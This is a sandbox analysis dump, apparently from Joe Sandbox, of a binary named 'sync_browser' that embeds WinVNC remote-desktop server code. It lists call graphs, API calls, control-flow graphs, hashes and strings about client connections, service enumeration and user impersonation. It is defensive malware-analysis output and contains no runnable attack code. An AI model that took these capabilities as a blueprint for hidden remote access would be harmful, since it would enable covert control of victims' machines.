7ff67e7c2a17 23689->23690 23691 7ff67e7c29bd 23689->23691 23693 7ff67e7c2a29 23690->23693 23708 7ff67e8770b4 71 API calls std::exception::exception 23690->23708 23691->23690 23696 7ff67e7c29e6 23691->23696 23695 7ff67e7c2a42 23693->23695 23709 7ff67e7c3050 81 API calls std::exception::exception 23693->23709 23695->23673 23697 7ff67e7c2d12 23696->23697 23710 7ff67e877110 71 API calls std::exception::exception 23696->23710 23699 7ff67e7c2d41 23697->23699 23700 7ff67e7c2d22 23697->23700 23702 7ff67e7c2d53 23699->23702 23713 7ff67e8770b4 71 API calls std::exception::exception 23699->23713 23711 7ff67e7c2fb0 71 API calls 23700->23711 23707 7ff67e7c2d3c 23702->23707 23714 7ff67e7c3050 81 API calls std::exception::exception 23702->23714 23703 7ff67e7c2d2f 23712 7ff67e7c2fb0 71 API calls 23703->23712 23707->23673 23708->23693 23709->23695 23710->23697 23711->23703 23712->23707 23713->23702 23714->23707 24837 7ff67e7cf700 280 API calls 2 library calls 24838 7ff67e7d2d00 24 API calls 24839 7ff67e7f34f7 10 API calls _getdrive 24840 7ff67e7c5910 13 API calls _getdrive 24841 7ff67e7eab10 96 API calls 2 library calls 24842 7ff67e7ca910 99 API calls _RunAllParam 24843 7ff67e7c9910 11 API calls _getdrive 24844 7ff67e7d3110 73 API calls 2 library calls 24845 7ff67e7d0310 73 API calls free 24846 7ff67e7e4003 207 API calls 2 library calls 24847 7ff67e7f3523 92 API calls 2 library calls 24853 7ff67e7e4003 239 API calls 2 library calls 24855 7ff67e7cff30 11 API calls _getdrive 24856 7ff67e7da130 173 API calls 4 library calls 24858 7ff67e7e3530 120 API calls 2 library calls 24859 7ff67e7f5040 SetRectRgn CombineRgn DeleteObject 24860 7ff67e7f1440 126 API calls _RunAllParam 24861 7ff67e7e4003 251 API calls 3 library calls 24862 7ff67e7e4003 219 API calls 2 library calls 24865 7ff67e7c1450 RaiseException 24867 7ff67e7d2a50 SetServiceStatus 24868 7ff67e7c6060 112 API calls 2 library calls 24869 7ff67e7c3e60 34 API calls 24870 7ff67e7c5a60 25 API calls 2 library calls 24873 7ff67e7e9060 129 API calls 24874 7ff67e7f3460 122 API calls 2 library calls 24876 7ff67e7f5a60 8 API calls 24879 7ff67e7c1a70 CloseClipboard 24881 7ff67e7d2a6e SetServiceStatus SetEvent SetEvent 24882 7ff67e7e8a70 133 API calls 4 library calls 24885 7ff67e7e4003 247 API calls 2 library calls 24886 7ff67e7ea085 98 API calls 24888 7ff67e7e9480 117 API calls _RunAllParam 24889 7ff67e7cd880 6 API calls _RunAllParam 24890 7ff67e7d2880 196 API calls 24894 7ff67e7da890 97 API calls 2 library calls 24895 7ff67e825e80 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 23481 7ff67e7e88a0 getpeername inet_ntoa 23493 7ff67e8792a4 23481->23493 23486 7ff67e7e893d InitializeCriticalSection 23519 7ff67e8579a0 EnterCriticalSection LeaveCriticalSection CreateSemaphoreA GetLastError RaiseException 23486->23519 23488 7ff67e7e895e 23489 7ff67e7e8988 23488->23489 23515 7ff67e7df840 23488->23515 23520 7ff67e877220 23489->23520 23491 7ff67e7e89c3 23494 7ff67e8792bb swscanf 23493->23494 23495 7ff67e7e8913 23493->23495 23531 7ff67e878c34 23494->23531 23503 7ff67e877978 23495->23503 23499 7ff67e8792e3 23499->23495 23500 7ff67e8792ec 23499->23500 23549 7ff67e884930 16 API calls __wtomb_environ 23500->23549 23507 7ff67e877983 23503->23507 23504 7ff67e878c34 malloc 70 API calls 23504->23507 23505 7ff67e7e8930 23505->23486 23505->23488 23506 7ff67e883238 _callnewh DecodePointer 23506->23507 23507->23504 23507->23505 23507->23506 23510 7ff67e8779a2 23507->23510 23508 7ff67e8779f3 23607 7ff67e87755c 70 API calls std::exception::operator= 23508->23607 23510->23508 23606 7ff67e877b94 80 API calls 23510->23606 23511 7ff67e877a04 23608 7ff67e882950 23511->23608 23514 7ff67e877a1a 23516 7ff67e7df885 23515->23516 23611 7ff67e857b50 EnterCriticalSection 23516->23611 23518 7ff67e7df926 23518->23489 23519->23488 23521 7ff67e877229 23520->23521 23522 7ff67e877234 23521->23522 23523 7ff67e8829e4 RtlCaptureContext RtlLookupFunctionEntry 23521->23523 23522->23491 23524 7ff67e882a69 23523->23524 23525 7ff67e882a28 RtlVirtualUnwind 23523->23525 23526 7ff67e882a8b IsDebuggerPresent 23524->23526 23525->23526 23667 7ff67e88dc94 23526->23667 23528 7ff67e882aea SetUnhandledExceptionFilter UnhandledExceptionFilter 23529 7ff67e882b08 _getdrive 23528->23529 23530 7ff67e882b12 GetCurrentProcess TerminateProcess 23528->23530 23529->23530 23530->23491 23532 7ff67e878c4c 23531->23532 23533 7ff67e878cc8 23531->23533 23535 7ff67e878c84 HeapAlloc 23532->23535 23536 7ff67e878c64 23532->23536 23541 7ff67e878cad 23532->23541 23545 7ff67e878cb2 23532->23545 23553 7ff67e883238 DecodePointer 23532->23553 23534 7ff67e883238 _callnewh DecodePointer 23533->23534 23537 7ff67e878ccd 23534->23537 23535->23532 23540 7ff67e878cbd 23535->23540 23536->23535 23550 7ff67e882ed0 70 API calls 2 library calls 23536->23550 23551 7ff67e882c70 70 API calls 5 library calls 23536->23551 23552 7ff67e87abd8 GetModuleHandleW GetProcAddress ExitProcess _amsg_exit 23536->23552 23539 7ff67e87ffc8 _errno 69 API calls 23537->23539 23539->23540 23540->23495 23548 7ff67e877de8 70 API calls 2 library calls 23540->23548 23555 7ff67e87ffc8 23541->23555 23547 7ff67e87ffc8 _errno 69 API calls 23545->23547 23547->23540 23548->23499 23550->23536 23551->23536 23554 7ff67e883253 23553->23554 23554->23532 23558 7ff67e8837c4 GetLastError FlsGetValue 23555->23558 23557 7ff67e87ffd1 23557->23545 23559 7ff67e8837ea 23558->23559 23560 7ff67e883832 SetLastError 23558->23560 23570 7ff67e8832ec 23559->23570 23560->23557 23563 7ff67e8837ff FlsSetValue 23564 7ff67e88382b 23563->23564 23565 7ff67e883815 23563->23565 23584 7ff67e878bf4 23564->23584 23575 7ff67e88370c 23565->23575 23569 7ff67e883830 23569->23560 23571 7ff67e883311 23570->23571 23573 7ff67e883351 23571->23573 23574 7ff67e88332f Sleep 23571->23574 23590 7ff67e889234 23571->23590 23573->23560 23573->23563 23574->23571 23574->23573 23598 7ff67e8877d0 23575->23598 23577 7ff67e883765 23578 7ff67e8876d0 _tzset LeaveCriticalSection 23577->23578 23579 7ff67e88377a 23578->23579 23580 7ff67e8877d0 _lock 70 API calls 23579->23580 23581 7ff67e883784 ___lc_codepage_func 23580->23581 23582 7ff67e8876d0 _tzset LeaveCriticalSection 23581->23582 23583 7ff67e8837b6 GetCurrentThreadId 23582->23583 23583->23560 23585 7ff67e878bf9 RtlFreeHeap 23584->23585 23589 7ff67e878c29 free 23584->23589 23586 7ff67e878c14 23585->23586 23585->23589 23587 7ff67e87ffc8 _errno 68 API calls 23586->23587 23588 7ff67e878c19 GetLastError 23587->23588 23588->23589 23589->23569 23591 7ff67e889249 23590->23591 23595 7ff67e889266 23590->23595 23592 7ff67e889257 23591->23592 23591->23595 23593 7ff67e87ffc8 _errno 69 API calls 23592->23593 23596 7ff67e88925c 23593->23596 23594 7ff67e88927e HeapAlloc 23594->23595 23594->23596 23595->23594 23595->23596 23597 7ff67e883238 _callnewh DecodePointer 23595->23597 23596->23571 23597->23595 23599 7ff67e8877ff EnterCriticalSection 23598->23599 23600 7ff67e8877ee 23598->23600 23604 7ff67e8876e8 70 API calls 7 library calls 23600->23604 23602 7ff67e8877f3 23602->23599 23605 7ff67e87af34 70 API calls 5 library calls 23602->23605 23604->23602 23605->23599 23606->23508 23607->23511 23609 7ff67e88297e 23608->23609 23610 7ff67e8829bd RaiseException 23609->23610 23610->23514 23612 7ff67e857b6d 23611->23612 23613 7ff67e857b84 23611->23613 23614 7ff67e882950 RaiseException 23612->23614 23631 7ff67e88285c 23613->23631 23614->23613 23617 7ff67e857bc9 GetLastError 23618 7ff67e882950 RaiseException 23617->23618 23623 7ff67e857be4 23618->23623 23619 7ff67e857c0b 23620 7ff67e857c18 SetThreadPriority 23619->23620 23621 7ff67e857c27 GetLastError 23620->23621 23622 7ff67e857c43 ResumeThread 23620->23622 23624 7ff67e882950 RaiseException 23621->23624 23625 7ff67e857c52 GetLastError 23622->23625 23626 7ff67e857c6e LeaveCriticalSection 23622->23626 23623->23619 23623->23620 23627 7ff67e882950 RaiseException 23623->23627 23628 7ff67e857c42 23624->23628 23629 7ff67e882950 RaiseException 23625->23629 23626->23518 23627->23619 23628->23622 23630 7ff67e857c6d 23629->23630 23630->23626 23632 7ff67e88289c 23631->23632 23633 7ff67e882887 23631->23633 23637 7ff67e8832ec __wtomb_environ 70 API calls 23632->23637 23634 7ff67e87ffc8 _errno 70 API calls 23633->23634 23635 7ff67e88288c 23634->23635 23654 7ff67e8849d4 23635->23654 23639 7ff67e8828b0 23637->23639 23638 7ff67e857bb9 23638->23617 23638->23623 23640 7ff67e882920 23639->23640 23649 7ff67e883848 23639->23649 23641 7ff67e878bf4 free 70 API calls 23640->23641 23643 7ff67e882928 23641->23643 23643->23638 23657 7ff67e880008 70 API calls 2 library calls 23643->23657 23645 7ff67e88370c __doserrno 70 API calls 23647 7ff67e8828cc CreateThread 23645->23647 23647->23638 23648 7ff67e882918 GetLastError 23647->23648 23648->23640 23650 7ff67e8837c4 __doserrno 70 API calls 23649->23650 23651 7ff67e883853 23650->23651 23652 7ff67e8828bd 23651->23652 23658 7ff67e87af34 70 API calls 5 library calls 23651->23658 23652->23645 23659 7ff67e884964 DecodePointer 23654->23659 23657->23638 23658->23652 23660 7ff67e8849c3 23659->23660 23661 7ff67e8849a2 23659->23661 23666 7ff67e884930 16 API calls __wtomb_environ 23660->23666 23661->23638 23667->23528 24899 7ff67e7f54a0 109 API calls 4 library calls 24900 7ff67e7f5ca0 331 API calls 4 library calls 24901 7ff67e7dcca0 115 API calls 24907 7ff67e7ca6b0 93 API calls 2 library calls 24908 7ff67e7d3cb0 RegCreateKeyExA RegOpenKeyExA RegDeleteValueA RegCloseKey RegCloseKey 24909 7ff67e7d34b0 13 API calls _getdrive 24912 7ff67e843ca0 75 API calls 3 library calls
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$Thread$CloseCriticalSection$CurrentEnterFilefree$BuffersErrorFlushHandleInputLeaveLibraryNameObjectOpenSleep$AddressComputerCountCreateDeleteFreeInformationLastLoadModeModulePriorityProcRectTickTimeUser_snprintfgethostnametime
                                                                                          • String ID: ( $ - $Could not connect to %s!$Could not connect using %s!$Host name unavailable$LOGEXIT$WinVNC$\logging.dll$application mode$service mode$vncclient.cpp : PostAddNewClient I$vncclient.cpp : PostAddNewClient II$vncclient.cpp : authenticated connection$vncclient.cpp : client connected : %s (%hd)$vncclient.cpp : client disconnected : %s (%hd)$vncclient.cpp : failed to close desktop$vncclient.cpp : negotiated version$vncclient.cpp : sent pixel format to client$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : PostAddNewClient failed$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
                                                                                          • API String ID: 459429253-3399855497
                                                                                          • Opcode ID: fe95b472391574baf351958184c564c7a4f4164416ccc65e9b7f2c941ff69469
                                                                                          • Instruction ID: 7d4f9c2cd26a3984c5a4a9f864f8dccf1b6fe2f50c5c02bd1f093b237caa8774
                                                                                          • Opcode Fuzzy Hash: fe95b472391574baf351958184c564c7a4f4164416ccc65e9b7f2c941ff69469
                                                                                          • Instruction Fuzzy Hash: C8A29D27A18A8185EB50CB29C848BFE77A5FB94B94F058232EA5D877E5DF3CD449C700

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProcProcess$CloseCreateCurrentFirstFreeHandleLoadMetricsProcess32SessionSnapshotSystemToolhelp32
                                                                                          • String ID: ProcessIdToSessionId$WTSGetActiveConsoleSessionId$explorer.exe$kernel32.dll
                                                                                          • API String ID: 1881659197-3751679782
                                                                                          • Opcode ID: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
                                                                                          • Instruction ID: 69a59a6515a55ec1da01591eeca2e238f830dac3b274aef8c34d5bd9c8edb72a
                                                                                          • Opcode Fuzzy Hash: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
                                                                                          • Instruction Fuzzy Hash: 77414033A28B4296EA61DF19A814179A3A8FF68790F441235F95E877A4DF3CE40DC700

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user , xrefs: 00007FF67E829FB7
                                                                                          • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s , xrefs: 00007FF67E82A06F
                                                                                          • vncservice.cpp : getusername error %d, xrefs: 00007FF67E82A04A
                                                                                          • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS , xrefs: 00007FF67E82A094
                                                                                          • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0, xrefs: 00007FF67E829F7F
                                                                                          • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on , xrefs: 00007FF67E82A01F
                                                                                          • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station , xrefs: 00007FF67E829F3B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$User$InformationNameObjectProcessRevertSelfStationWindow
                                                                                          • String ID: vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0$vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s $vncservice.cpp : getusername error %d
                                                                                          • API String ID: 3635673080-2232443292
                                                                                          • Opcode ID: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                                                          • Instruction ID: a59f351d84fac19607327a9875d82f6057fef5612179749a15d36282debd4e23
                                                                                          • Opcode Fuzzy Hash: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                                                          • Instruction Fuzzy Hash: EB413027F2C94392EB40CB69F8442B9A3A5AFB4748F944432F65DC6565EE3CE44DC740

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 633 7ff67e82d890-7ff67e82d8c0 634 7ff67e82d8c6-7ff67e82d8c9 633->634 635 7ff67e82dadf 633->635 637 7ff67e82d8cb-7ff67e82d8ce 634->637 638 7ff67e82d8d3-7ff67e82d8d7 634->638 636 7ff67e82dae1-7ff67e82dafa 635->636 637->636 639 7ff67e82d8dd-7ff67e82d8e5 638->639 640 7ff67e82da85-7ff67e82da8c 638->640 639->640 641 7ff67e82d8eb-7ff67e82d905 639->641 642 7ff67e82dab0-7ff67e82dabb WSAGetLastError 640->642 643 7ff67e82da8e-7ff67e82daa2 recv 640->643 644 7ff67e82d907-7ff67e82d910 EnterCriticalSection 641->644 645 7ff67e82d911-7ff67e82d91e 641->645 642->635 648 7ff67e82dabd-7ff67e82dabf 642->648 646 7ff67e82daae 643->646 647 7ff67e82daa4-7ff67e82daac 643->647 644->645 649 7ff67e82d936-7ff67e82d949 645->649 650 7ff67e82d920-7ff67e82d934 645->650 646->642 651 7ff67e82dac7-7ff67e82dada call 7ff67e7c3730 646->651 647->648 648->637 652 7ff67e82dac5 648->652 656 7ff67e82d950-7ff67e82d956 649->656 650->656 651->635 652->640 657 7ff67e82d958-7ff67e82d96e call 7ff67e7c3730 656->657 658 7ff67e82d986-7ff67e82d98a 656->658 666 7ff67e82d96f-7ff67e82d972 657->666 659 7ff67e82d98d-7ff67e82d98f 658->659 661 7ff67e82da1e-7ff67e82da33 659->661 662 7ff67e82d995-7ff67e82d99c 659->662 667 7ff67e82da4f-7ff67e82da67 661->667 668 7ff67e82da35-7ff67e82da4d 661->668 664 7ff67e82d9c6-7ff67e82d9d1 WSAGetLastError 662->664 665 7ff67e82d99e-7ff67e82d9b2 recv 662->665 671 7ff67e82d9f7-7ff67e82da19 WSAGetLastError call 7ff67e7c3730 664->671 672 7ff67e82d9d3-7ff67e82d9d7 664->672 669 7ff67e82d9c4 665->669 670 7ff67e82d9b4-7ff67e82d9c2 665->670 666->635 673 7ff67e82d978-7ff67e82d981 LeaveCriticalSection 666->673 678 7ff67e82da6e-7ff67e82da71 667->678 668->678 669->664 676 7ff67e82d9d9-7ff67e82d9f2 call 7ff67e7c3730 669->676 670->659 671->666 672->659 673->635 676->666 678->637 681 7ff67e82da77-7ff67e82da80 LeaveCriticalSection 678->681 681->637
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                          • String ID: vsocket.cpp : WriteExact: DSMPlugin-RestoreBuffer Alloc Error$vsocket.cpp : socket error 1: %d$vsocket.cpp : zero bytes read1$vsocket.cpp : zero bytes read2
                                                                                          • API String ID: 3168844106-4245644328
                                                                                          • Opcode ID: fb51c5f38e3ceb32ba6187375171630d2d9d6b8a6abb1b1af77451ade3fe2d73
                                                                                          • Instruction ID: 5ea7f6fb1837238b6ce0a0b76bec16731b8b2ab7e4cd8ee1c0094accad7caf21
                                                                                          • Opcode Fuzzy Hash: fb51c5f38e3ceb32ba6187375171630d2d9d6b8a6abb1b1af77451ade3fe2d73
                                                                                          • Instruction Fuzzy Hash: 2F618223A2CA8286E764CB29A4447BAA7A5FB64754F540231FE5ED36E4DF3CE44DC700

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 697 7ff67e7c9d00-7ff67e7c9d9b call 7ff67e7c29a0 700 7ff67e7c9db3-7ff67e7c9dc7 OpenSCManagerA 697->700 701 7ff67e7c9d9d 697->701 703 7ff67e7c9de0-7ff67e7c9e25 EnumServicesStatusA 700->703 704 7ff67e7c9dc9-7ff67e7c9dce 700->704 702 7ff67e7c9da0-7ff67e7c9db1 call 7ff67e878894 701->702 702->700 708 7ff67e7c9e2b-7ff67e7c9e36 GetLastError 703->708 709 7ff67e7c9fed-7ff67e7c9ffc CloseServiceHandle 703->709 706 7ff67e7c9dd0-7ff67e7c9dd4 call 7ff67e877914 704->706 707 7ff67e7c9dd9-7ff67e7c9ddb 704->707 706->707 712 7ff67e7ca00b-7ff67e7ca031 call 7ff67e877220 707->712 708->709 713 7ff67e7c9e3c-7ff67e7c9e3f call 7ff67e8771fc 708->713 714 7ff67e7c9ffe-7ff67e7ca002 call 7ff67e877914 709->714 715 7ff67e7ca007 709->715 720 7ff67e7c9e44-7ff67e7c9e4e 713->720 714->715 715->712 720->709 721 7ff67e7c9e54-7ff67e7c9e8d EnumServicesStatusA 720->721 722 7ff67e7c9e93-7ff67e7c9e9a 721->722 723 7ff67e7c9fe5-7ff67e7c9fe8 call 7ff67e8778d4 721->723 722->723 724 7ff67e7c9ea0 722->724 723->709 726 7ff67e7c9ea3-7ff67e7c9ea6 724->726 727 7ff67e7c9fe1 726->727 728 7ff67e7c9eac-7ff67e7c9ec5 OpenServiceA 726->728 727->723 728->727 729 7ff67e7c9ecb-7ff67e7c9edf QueryServiceConfigA 728->729 730 7ff67e7c9ee5-7ff67e7c9eee GetLastError 729->730 731 7ff67e7c9fc7-7ff67e7c9fdb CloseServiceHandle 729->731 730->731 732 7ff67e7c9ef4-7ff67e7c9f02 call 7ff67e8771fc 730->732 731->726 731->727 732->731 735 7ff67e7c9f08-7ff67e7c9f1e QueryServiceConfigA 732->735 736 7ff67e7c9f24-7ff67e7c9f8d call 7ff67e7c29a0 call 7ff67e7c9c80 call 7ff67e7ca120 735->736 737 7ff67e7c9fbf-7ff67e7c9fc2 call 7ff67e8778d4 735->737 745 7ff67e7c9faf-7ff67e7c9fb4 736->745 746 7ff67e7c9f8f-7ff67e7c9fa8 call 7ff67e8785e0 736->746 737->731 745->737 748 7ff67e7c9fb6-7ff67e7c9fba call 7ff67e877914 745->748 746->745 748->737
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseConfigEnumErrorHandleLastOpenQueryServicesStatus$Manager
                                                                                          • String ID:
                                                                                          • API String ID: 3151975580-0
                                                                                          • Opcode ID: a208b4aa3cfba9d326f69aebc0107f6b12e7bbd25a632013c5e0262ab2b99495
                                                                                          • Instruction ID: 9204c94d6ee992de4dc38582b4535e0345a7216e2c12e7b09ee060db94035757
                                                                                          • Opcode Fuzzy Hash: a208b4aa3cfba9d326f69aebc0107f6b12e7bbd25a632013c5e0262ab2b99495
                                                                                          • Instruction Fuzzy Hash: 26918123B28A4189FB50DBA5D4046AD73B9BB587A8F404635EE5D97BE8EF3CD509C300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
